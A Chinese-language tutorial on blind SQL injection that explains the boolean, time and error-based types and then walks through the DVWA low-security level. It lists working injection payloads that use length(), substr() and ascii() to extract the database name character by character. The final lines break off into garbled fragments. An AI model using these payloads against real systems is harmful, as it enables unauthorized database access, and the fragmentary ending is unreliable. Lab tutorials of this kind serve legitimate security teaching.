SQL盲注原理
1.SQL盲注概念
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。
2.分类
基于布尔的盲注: 即可以根据返回页面判断条件真假的注入;基于时间的盲注: 即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;基于报错的盲注: 即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;
3.盲注测试思路
1.对于基于布尔的盲注,通过构造真or假判断条件(数据库各项信息取值的大小比较, 如:字段个数,字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…), 将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果 (True、False);然后不断调整判断条件中的数值以逼近真实值,特别是需要关注 响应从True<–>False发生变化的转折点。
2.对于基于时间的盲注,通过构造真or假判断条件的sql语句, 且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求, 观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。
3.对于基于报错的盲注,搜寻查看网上部分Blog,基本是在rand()函数作为group by的字段进行联用的时候会违反Mysql的约定而报错。rand()随机不确定性,使得group by会使用多次而报错。
4.盲注渗透测试流程
1.判断是否存在注入,注入的类型
2.猜解当前数据库名称
3.猜解数据库中的表名
4.猜解表中的字段名
5.获取表中的字段值
6.验证字段值的有效性
7.获取数据库的其他信息:版本、用户…
实战教程
1、low等级
1.1代码审计
代码对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞;
同时SQL语句查询返回的结果只有两种:
存在:User ID exists in the database;不存在:User ID is MISSING from the database;
单引号注入
$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
1.2漏洞利用
a基于布尔的盲注:
a.1判断是否存在注入,注入是字符型还是数字型
若1' and 1=1 # //存在exists
1' and 1=2 # //不存在missing
存在字符型注入
若1 and 1=1 # //存在exists
1 and 1=2 # //存在exists
这两个都是存在,不是数字型注入。输入1' and 1=1# 实际后台执行,返回存在。
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#';
输入1' and 1=2# 实际后台执行,返回不存在。
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=2#';
说明存在字符型的SQL盲注。
a.2猜解当前的数据库名称
猜解数据库名,首先要猜解数据库名的各个属性,然后挨个猜解字符。数据库名称的属性:字符长度、字符组成的元素(字符/数字/下划线/…)
元素的位置(首位/第一位/…/末位)
2.1)判断数据库名称长度(二分法思维)
1' and length(database())>10 # //missing
1' and length(database())>5 # //missing
1' and length(database())>3 # //exists
1' and length(database())=4 # //exists
说明数据库名称长度为4个字符
SELECT first_name, last_name FROM users WHERE user_id = '1' and length(database())=4 # ';
2.2) 判断数据库名称的字符组成元素:
利用substr()函数从给定字符串中,从指定位置开始截取指定长度的字符串,分离出数据库名称的位置,并分别转换为ASCII,与对应的ASCII值比较大小,找到值相同的字符。
mysql数据库中的字符串函数substr()的参数含义。
用法:
substr(string, start, length);
string为字符串;
start为起始位置;
length为长度。
注意:mysql中substr()的start是从1开始的,而不是0
1' and ascii(substr(database(),1,1))>50 # //exists
1' and ascii(substr(database(),1,1))=100 # //exists
第一个字符为:100--->d
1' and ascii(substr(database(),2,1))=118 # //exists
第二个字符为:118--->v
1' and ascii(substr(database(),3,1))=119 # //exists
第三个字符为:119--->w
1' and ascii(substr(database(),4,1))=97 # //exists
第四个字符为:97--->a
)
ai_base)
)
 组合)
